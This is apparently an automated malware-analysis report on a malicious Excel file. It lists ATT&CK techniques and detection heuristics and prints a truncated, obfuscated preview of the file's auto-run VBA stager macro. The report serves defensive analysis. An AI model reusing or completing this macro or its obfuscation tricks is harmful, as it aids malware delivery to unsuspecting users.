MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is an Excel file containing a Workbook_Open VBA macro. This macro utilizes the Shell() function to execute a Base64-encoded PowerShell command. The decoded command appears to be a stager, indicating the file's purpose is to download and execute a second-stage payload. The obfuscated nature of the PowerShell command and the use of a macro-based stager are common techniques for malware delivery.
Heuristics 7
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGERVBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11466 bytes |
SHA-256: f646612ed54efe11ee7d5f11ca9d4b25923e61236c95eb329f4794aba277d49d |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 5 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
aOklWA1xBbfmk3Fw.iUrGGAqkZjPWRhaDqH8M
Dim oSx99mJIfQ2aYl98CVXPnM4ym26EcyA45hPNgsHczfDHrx7pi As CheckBox
Dim c_StqiaX8TFpDpqO7f1UsYSM5ZFHuFx4Of_xqIL8xziWBvuyU2 As CheckBox
Dim tQESyCpExPaQl1fKZfp3hwR As CheckBox
Dim f2z6KGnPw3Ufx5 As CheckBox
Dim p6FjT6efLr1yUMHbS68Kw7Kt4pkJdsd9Wdzsu7bUV_oG_UuY As CheckBox
Dim GShXgkGstVpmTTAbL As CheckBox
Dim ZzWYqUclxwPDog5JBJIEavV As CheckBox
Dim E9WOyAB9K4L54ArlL55vTaoqHqHQ As CheckBox
Dim zQEXncQZR_mkvx_Ial_ISg7Je9BmSpFF1tH3wxPZsQSGPS_fVdO As CheckBox
Dim fp97QT53nZmEk7fsBoJUmUi As CheckBox
Dim ZBMy4K9eOxZjY2vzh24l9_JqI As CheckBox
Dim si8zKHkIFh5CeAqn5VQJVE1NxlcrsjT1fnIk As CheckBox
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "aOklWA1xBbfmk3Fw"
Dim mTjzEagIqgqGy2hDNtMRawYUL9I61sUgmwNKjNXC4X2FXM9zFD1Flpgy4MmEPjR8KHcAmVc_TIXB5R68_Syv1N57OYPUkQuSE44Os8Ksj1uaQd3kQnE7tfE7MftMEGWBXD As String
Function AnDnxYRSzwB1L7Dq2ewmrrBio3ZeLCez1_mO(ULlGiE__KiNTmJKnld7BomkLUAhVV5Jz4TyKLwi9vHKthk2FFMboDd1qjYuggrrPXWYRT_Zy48NfZ1mtHaNHaduXbGjvABZDY5UIJhuFvmuEOTOsvAXEcix3l_zLXmw2fJEeebhjoFUxsoHF1z_)
Dim u_GyDDIwkppz9PD3TosERHx2W6cWP As CheckBox
Dim VwEn9iYrGo7w12YHXpUBxmLr_4lOOa As CheckBox
Dim GiueN3iJ9qnIK_vRZOWr8NGTbriWiD7HbpfVAUlfhLpmVmaL5ucU1fb As CheckBox
Dim SjhcUPDmilP5sBp5Vny_aaXHmYF8uTM6FweVkdhnC44C6AQg2pNAU2a2KXz5H_2MXTx6eRS2EJBfg
Dim ZYCfSKk4tepdbYQ_l1Hthd8xOUa As CheckBox
Dim wjjP6Ln5jQEKVkv3166secWr_ As CheckBox
Dim VrS6aMO7txRHMtQxcqvenvHujE1Sl6RL As CheckBox
Dim cOLzbnUAVqqaERqErd_Hse5JPebi5YhkIeLA9nuIWGdpeRB9TLZRn8k7SBh6JuE6HEPjEoFDs4tjAMn8ccMq9N7K4Nq6_x8lBggYAZ2o_UhtL_5EWjbqgW74H_pz8I945GhcpM6BjhkloK8
Dim PhdS9GCzNkwbsmKn5BvjKTihgTUV6TxdEO7KvcchsoYIUR1 As CheckBox
Dim bonp3flp595vnup44wQUco_1ZgL1e As CheckBox
Dim XLNc3pPm48ciAKzqyvBudUC6VvowNURtI_irfI2_lP3R23nw_s As CheckBox
Dim qYytYBHQEE_cWhnrX_lGIn3AGMbtDcG2vem35XighMD As CheckBox
Dim v9H2TnIdmJ1hCewlKiXMl As CheckBox
Dim Gp15uv9Y_i6jFA8TG_38cq47jVFvW7H_aw1a_X3 As CheckBox
Set cOLzbnUAVqqaERqErd_Hse5JPebi5YhkIeLA9nuIWGdpeRB9TLZRn8k7SBh6JuE6HEPjEoFDs4tjAMn8ccMq9N7K4Nq6_x8lBggYAZ2o_UhtL_5EWjbqgW74H_pz8I945GhcpM6BjhkloK8 = CreateObject(mTjzEagIqgqGy2hDNtMRawYUL9I61sUgmwNKjNXC4X2FXM9zFD1Flpgy4MmEPjR8KHcAmVc_TIXB5R68_Syv1N57OYPUkQuSE44Os8Ksj1uaQd3kQnE7tfE7MftMEGWBXD)
Dim VdLEQlaXum1ZSSmcZu4TXnLBFZ5HRIfSrK As CheckBox
Dim fcOklSG8THffyowSZpEDcqQJ8zpQ_kFfrFwILyGjKY As CheckBox
Dim RCejjOU9syMnqyK_lvmz2sB9wq2mEjge1DWMnWNY6_2PQCY78FKU6UgiAev As CheckBox
AWpMAF_J9bcnuenC6Kwhiw7BKL8mbbrCLg2LkYDznTEds29qZDazjeULZmAwGarfsZaLmaaeF = Chr(478 - 380) & Chr(419 - 314) & Chr(141 - 31) & Chr(66 - 20) & Chr(239 - 141) & Chr(427 - 330) & Chr(205 - 90) & Chr(391 - 290) & Chr(361 - 307) & Chr(105 - 53)
Dim Wq2GQrvma7ZMfL3w1tptQ4o8XJheewKGkU As CheckBox
Dim BMKs8iPue_p8ysbtrPyBjbB4sEIPFmuQlIJnjF As CheckBox
Dim vFbfXnPYUyBu_5Ri As CheckBox
Set SjhcUPDmilP5sBp5Vny_aaXHmYF8uTM6FweVkdhnC44C6AQg2pNAU2a2
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.